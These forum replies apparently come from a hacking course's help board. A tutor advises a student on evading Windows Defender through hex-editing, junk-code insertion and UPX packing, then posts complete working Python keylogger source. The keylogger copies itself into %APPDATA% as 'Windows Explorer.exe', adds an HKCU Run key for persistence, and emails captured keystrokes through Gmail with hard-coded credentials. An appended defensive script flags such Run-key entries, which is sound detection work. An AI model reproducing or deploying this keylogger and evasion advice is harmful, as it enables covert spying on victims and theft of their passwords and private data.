Forum Replies Created
AJ (Participant)
Hi Baccardi,
I don't advise you to install VirtualBox inside Kali on the Pi, since you already have it and it comes pre-installed with the required tools. It's best to use another OS such as Windows or Mac OS X for setting up the virtual lab to follow along with the methods covered in the course, because you might face A LOT of issues while trying to set it up on the Pi.
In addition, the Pi doesn't support virtualization, so you won't be able to run virtualization software such as VirtualBox or VMware, etc. on the Pi.

AJ (Participant)
Hi Alison,
You have several options to bypass Windows Defender, so you can:
1. Modify the backdoor executable after packaging using a hex editor. You can use
    hexeditor <filename>
which comes pre-installed in Kali, and try to modify some part of it, but please make sure that you don't break the payload. Zaid does cover how to do this in the "Social Engineering" course, though you can check for more examples online to build on this, as shown below:
https://null-byte.wonderhowto.com/how-to/hack-your-game-saves-basic-guide-hex-editing-0132155/
https://hackingandsecurity.blogspot.com/2016/03/fud-through-hex-editor-heading.html
2. Add some random data, like various printing functions and statements, and include new variable names to make the backdoor look more unique, thus increasing the chance of generating a unique signature that can bypass the Windows Defender signature DB. This seems daunting, but it is a trial-and-error process, so you have to try to edit the code without breaking it after you package the backdoor Python source code of "klog_object.py". You can also install UPX to enhance the backdoor exe when you test it on nodistribute.com, from
https://github.com/upx/upx/releases/
This is covered in section 15, in which you will learn how to bypass a reasonable number of AVs if you follow the same procedure and the above notes and resources.
Please let me know if you face any issues again. Thank you.
AJ (Participant)
Hi Alison,
Please give me some time, and I'll get back to you ASAP. BTW, did the persistence feature work for you?
AJ (Participant)
Hi Alison,
I am sorry for the late reply. I actually managed to reproduce the same keylogger with persistence, and it worked. Please check the following source code, and try to use it for later debugging or if you want to build on this:
klog_object.py
    #!/usr/bin/env python
    import persistent_keylogger

    # 120 seconds between reports; the Gmail credentials are used both as the
    # SMTP login and as sender/recipient of the keystroke reports.
    my_keylogger = persistent_keylogger.Keylogger(120, "[email protected]", "alexnuga2")
    my_keylogger.start()
Actual code of persistence_keylogger.py
    #!/usr/bin/env python
    import pynput.keyboard
    import threading
    import smtplib
    import shutil
    import os
    import sys
    import subprocess


    class Keylogger:
        def __init__(self, time_interval, email, password):
            self.log = "Keylogger started"
            self.become_persistent()
            self.interval = time_interval
            self.email = email
            self.password = password

        def become_persistent(self):
            # Copy the running executable into %APPDATA% under a name that looks
            # like a Windows component, then register it in the current user's
            # Run key so it starts again after a reboot (no admin rights needed).
            evil_file_location = os.environ["appdata"] + "\\Windows Explorer.exe"
            if not os.path.exists(evil_file_location):
                shutil.copyfile(sys.executable, evil_file_location)
                # Raw string: the registry path contains backslashes that Python
                # would otherwise try to interpret as escape sequences.
                subprocess.call(r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run '
                                r'/v update /t REG_SZ /d "' + evil_file_location + '"',
                                shell=True)

        def append_to_log(self, string):
            self.log = self.log + string

        def process_key_press(self, key):
            # Printable keys expose .char; special keys (Key.enter, Key.shift, ...)
            # raise AttributeError and are logged by name instead.
            try:
                current_key = str(key.char)
            except AttributeError:
                if key == pynput.keyboard.Key.space:
                    current_key = " "
                else:
                    current_key = " " + str(key) + " "
            self.append_to_log(current_key)

        def report(self):
            # Mail the buffered keystrokes, clear the buffer and reschedule itself.
            self.send_mail(self.email, self.password, "\n\n" + self.log)
            self.log = ""
            timer = threading.Timer(self.interval, self.report)
            timer.start()

        def send_mail(self, email, password, message):
            server = smtplib.SMTP("smtp.gmail.com", 587)
            server.starttls()
            server.login(email, password)
            server.sendmail(email, email, message)
            server.quit()

        def start(self):
            keyboard_listener = pynput.keyboard.Listener(on_press=self.process_key_press)
            with keyboard_listener:
                self.report()
                keyboard_listener.join()
Note: I changed the file names and tested the keylogger with my own Gmail, even after the target system had been restarted, but I put your name back in for convenience. Make sure you use the correct file names, since I changed them when I edited the above source code.
Please let me know how it goes. Thank you.
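The persistence in the post above leaves two artefacts on the target: a copy of the executable in %APPDATA% named like a Windows component ("Windows Explorer.exe"), and an HKCU Run value pointing at it. The following is an added example (not code from the post or the course) of the triage a defender would run over the Run key to catch exactly that pattern. The entries are constructed sample data; on a real host you would read them with winreg or `reg query`, which is left out so the script runs anywhere. The directory list and look-alike names are assumptions for the example, not an exhaustive rule set.

```python
#!/usr/bin/env python3
"""Triage HKCU Run-key entries for user-writable executables and look-alike
names. Added example; the sample entries below are constructed."""
import ntpath

# Assumption: directories an unprivileged user can write to. A Run entry that
# launches an executable from one of these deserves a second look, because
# installers for legitimate software normally land in Program Files.
USER_WRITABLE_ROOTS = (
    "c:\\users\\",          # %APPDATA%, %LOCALAPPDATA%, Downloads, Desktop ...
    "c:\\programdata\\",
    "c:\\windows\\temp\\",
)

# Assumption: base names (without .exe) that mimic Windows components.
LOOKALIKE_NAMES = {"explorer", "windows explorer", "svchost", "csrss",
                   "winlogon", "lsass", "windows update", "update"}

# Assumption: value names so generic that they tell the analyst nothing.
GENERIC_VALUE_NAMES = {"update", "updater", "service", "run"}


def unquote_command(value):
    """Extract the executable path from a Run value.

    Quoted:   "C:\\x\\Windows Explorer.exe" /arg  -> C:\\x\\Windows Explorer.exe
    Unquoted: C:\\x\\tool.exe /arg                -> C:\\x\\tool.exe
    """
    value = value.strip()
    if value.startswith('"'):
        end = value.find('"', 1)
        return value[1:end] if end != -1 else value[1:]
    idx = value.lower().find(".exe")
    if idx != -1:
        return value[:idx + 4]
    return value.split(" ", 1)[0]


def triage_run_entry(name, value):
    """Return the reasons an entry looks suspicious (empty list = nothing found)."""
    reasons = []
    exe = unquote_command(value)
    low = exe.lower()
    if low.startswith(USER_WRITABLE_ROOTS):
        reasons.append("executable lives in a user-writable directory")
    base = ntpath.splitext(ntpath.basename(low))[0]
    if base in LOOKALIKE_NAMES:
        reasons.append("file name mimics a Windows component: %r" % ntpath.basename(exe))
    if name.lower() in GENERIC_VALUE_NAMES:
        reasons.append("generic value name %r" % name)
    return reasons


def scan(entries):
    """Map value name -> reasons for every flagged (name, value) pair."""
    flagged = {}
    for name, value in entries:
        reasons = triage_run_entry(name, value)
        if reasons:
            flagged[name] = reasons
    return flagged


# Constructed sample of what `reg query HKCU\...\Run` might list.
SAMPLE_RUN_ENTRIES = [
    ("OneDrive", r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background'),
    ("update", r'"C:\Users\alison\AppData\Roaming\Windows Explorer.exe"'),
    ("SecurityHealth", r"%windir%\system32\SecurityHealthSystray.exe"),
]

if __name__ == "__main__":
    for name, reasons in scan(SAMPLE_RUN_ENTRIES).items():
        print(name)
        for reason in reasons:
            print("  -", reason)
```

The value name "update" and the path under Roaming are exactly what the reg add line in the keylogger writes, so the sample entry is flagged on all three checks, while the two legitimate entries pass. On a live system, expand environment variables in the value (os.path.expandvars) before calling triage_run_entry, and treat the result as a lead for hash and signature checks rather than a verdict.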
AJ (Participant)
Hi Alison,
Sorry for the late reply. Can you show me the source code of zlogger.py, so we can better debug the issue, please?
Thank you.